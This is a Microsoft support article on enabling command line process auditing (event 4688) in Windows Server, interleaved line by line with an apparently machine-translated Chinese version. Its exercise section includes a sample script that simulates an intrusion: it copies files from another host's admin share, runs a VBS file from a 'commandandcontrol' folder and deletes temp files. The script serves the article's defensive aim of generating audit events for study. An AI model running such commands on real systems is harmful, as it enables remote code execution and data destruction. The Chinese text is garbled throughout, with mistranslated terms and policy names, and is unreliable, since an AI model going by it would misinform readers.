命令列處理程序稽核Command line process auditing

適用於:Windows Server 2016、Windows Server 2012 R2Applies To: Windows Server 2016, Windows Server 2012 R2

作者: Justin Turner 資深支援工程師視窗群組Author: Justin Turner, Senior Support Escalation Engineer with the Windows group

注意

本文由 Microsoft 客戶支援工程師撰寫,以及適用於系統管理員經驗和系統設計師超過參考 TechNet 上的主題通常會提供深入的技術解釋的功能與 Windows Server 2012 R2 方案正在尋找。This content is written by a Microsoft customer support engineer, and is intended for experienced administrators and systems architects who are looking for deeper technical explanations of features and solutions in Windows Server 2012 R2 than topics on TechNet usually provide. 不過,尚未經歷相同編輯行程,以便某些語言的似乎比哪些通常位於 TechNet 較少的外觀。However, it has not undergone the same editing passes, so some of the language may seem less polished than what is typically found on TechNet.

概觀Overview

  • 現有處理程序建立稽核事件 ID 4688 現在將會包含稽核資訊的命令列處理程序。The pre-existing process creation audit event ID 4688 will now include audit information for command line processes.

  • 它也可執行檔 SHA1 2 月 hash 登入 Applocker 事件登入It will also log SHA1/2 hash of the executable in the Applocker event log

    • 應用程式與服務 Logs\Microsoft\Windows\AppLockerApplication and Services Logs\Microsoft\Windows\AppLocker
  • 您可以透過 GPO,但預設停用You enable via GPO, but it is disabled by default

    • 「在 [處理程序建立事件包含命令列]"Include command line in process creation events"

稽核命令列

圖 7 圖 \\ * 阿拉伯文 16 事件 4688Figure SEQ Figure \* ARABIC 16 Event 4688

檢視已更新的事件編號 4688 參考 _Ref366427278 \h 圖 16 中。Review the updated event ID 4688 in REF _Ref366427278 \h Figure 16. 之前此更新的資訊適用於處理程序命令列取得登入。Prior to this update none of the information for Process Command Line gets logged. 因為這其他登入我們現在會看到不只開始使用 wscript.exe 程序,但也是用來執行描述。Because of this additional logging we can now see that not only was the wscript.exe process started, but that it was also used to execute a VB script.

設定Configuration

若要查看這項更新的效果,您必須支援兩個原則設定。To see the effects of this update, you will need to enable two policy settings.

您必須建立稽核程序稽核查看事件 ID 4688 支援。You must have Audit Process Creation auditing enabled to see event ID 4688.

若要讓的建立程序的稽核原則,編輯下列群組原則:To enable the Audit Process Creation policy, edit the following group policy:

原則的位置:電腦設定 > 原則 > Windows 設定 > 安全性設定 > 進階稽核設定 > 詳細追蹤Policy location: Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Configuration > Detailed Tracking

原則的名稱︰稽核建立程序Policy Name: Audit Process Creation

支援的: Windows 7 及以上Supported on: Windows 7 and above

描述日協助:Description/Help:

此安全性原則設定判斷是否作業系統產生稽核事件處理程序建立(開始)時,使用者建立該程式的名稱。This security policy setting determines whether the operating system generates audit events when a process is created (starts) and the name of the program or user that created it.

這些稽核事件可協助您了解如何使用電腦以及追蹤使用者活動。These audit events can help you understand how a computer is being used and to track user activity.

事件磁碟區:低根據使用量系統中,Event volume: Low to medium, depending on system usage

預設:未設定Default: Not configured

您必須以查看新增事件 4688 編號的項目,讓新的原則設定:在 [處理程序建立事件包含命令列In order to see the additions to event ID 4688, you must enable the new policy setting: Include command line in process creation events

表格 7 表格 \\ * 阿拉伯文 19 命令列處理程序原則設定Table SEQ Table \* ARABIC 19 Command line process policy setting

原則設定Policy Configuration 詳細資料Details
路徑Path 建立系統 Templates\System\Audit 程序Administrative Templates\System\Audit Process Creation
設定Setting 在 [處理程序建立事件包含命令列Include command line in process creation events
預設設定Default setting 不已設定(不支援)Not Configured (not enabled)
支援:Supported on: ??
描述Description 這項原則設定判斷資訊登入安全性稽核事件時已建立新的處理程序。This policy setting determines what information is logged in security audit events when a new process has been created.

這個設定只適用於時支援的建立程序的稽核原則。This setting only applies when the Audit Process Creation policy is enabled. 如果您可讓每個程序的命令列資訊將會登入一般的安全性事件木頭中的一部分稽核建立程序事件 4688 這項原則設定,「新的處理程序已建立,「工作站和的伺服器上套用這項原則設定。If you enable this policy setting the command line information for every process will be logged in plain text in the security event log as part of the Audit Process Creation event 4688, "a new process has been created," on the workstations and servers on which this policy setting is applied.

如果您可以停用或未設定這項原則設定,將不會稽核建立程序活動中包含處理程序的命令列的資訊。If you disable or do not configure this policy setting, the process's command line information will not be included in Audit Process Creation events.

未設定預設值:Default: Not configured

注意:所有使用者存取朗讀的安全性事件將能順利讀取任何的命令列引數當這個原則設定時,都建立程序。Note: When this policy setting is enabled, any user with access to read the security events will be able to read the command line arguments for any successfully created process. 命令列引數可能包含例如密碼或使用者資料的機密或私人資訊。Command line arguments can contain sensitive or private information such as passwords or user data.

稽核命令列

當您使用進階稽核原則設定時,您需要確認,這些設定不會覆寫基本稽核原則設定。When you use Advanced Audit Policy Configuration settings, you need to confirm that these settings are not overwritten by basic audit policy settings. 事件 4719 登時就會覆寫設定。Event 4719 is logged when the settings are overwritten.

稽核命令列

下列程序如何防止衝突封鎖任何基本稽核原則設定的應用程式。The following procedure shows how to prevent conflicts by blocking the application of any basic audit policy settings.

若要確保不會覆寫進階稽核原則設定To ensure that Advanced Audit Policy Configuration settings are not overwritten

稽核命令列

  1. 打開群組原則管理主控台Open the Group Policy Management console

  2. 預設網域原則,以滑鼠右鍵按一下,然後按一下 [編輯。Right-click Default Domain Policy, and then click Edit.

  3. 按兩下 [電腦設定,按兩下原則],然後按兩下 [Windows 設定。Double-click Computer Configuration, double-click Policies, and then double-click Windows Settings.

  4. 按兩下 [安全性設定,按兩下 [本機原則],然後按一下安全性選項。Double-click Security Settings, double-click Local Policies, and then click Security Options.

  5. 按兩下稽核:推動稽核原則子分類設定 (Windows Vista 或更新版本) 要覆寫稽核原則分類設定,然後按一下 [此原則。Double-click Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings, and then click Define this policy setting.

  6. 按兩下、,然後按一下 [確定]Click Enabled, and then click OK.

其他資源Additional Resources

稽核建立程序Audit Process Creation

進階安全性稽核原則 Step-by-Step 指南Advanced Security Audit Policy Step-by-Step Guide

AppLocker:常見問題集AppLocker: Frequently Asked Questions

試試看:探索命令列處理程序稽核Try This: Explore command line process auditing

  1. 稽核建立程序事件,確保您不會覆寫進階稽核原則設定Enable Audit Process Creation events and ensure the Advance Audit Policy configuration is not overwritten

  2. 建立指令碼,將會產生感興趣的一些事件執行指令碼。Create a script that will generate some events of interest and execute the script. 觀察到的事件。Observe the events. 事件產生課程中使用的指令碼看起來像這樣:The script used to generate the event in the lesson looked like this:

    mkdir c:\systemfiles\temp\commandandcontrol\zone\fifthward  
    copy \\192.168.1.254\c$\hidden c:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward  
    start C:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward\ntuserrights.vbs  
    del c:\systemfiles\temp\*.* /Q  
    
  3. 讓命令列稽核處理程序Enable the command line process auditing

  4. 執行之前,請先相同做為指令碼,並觀察到的事件Execute the same script as before and observe the events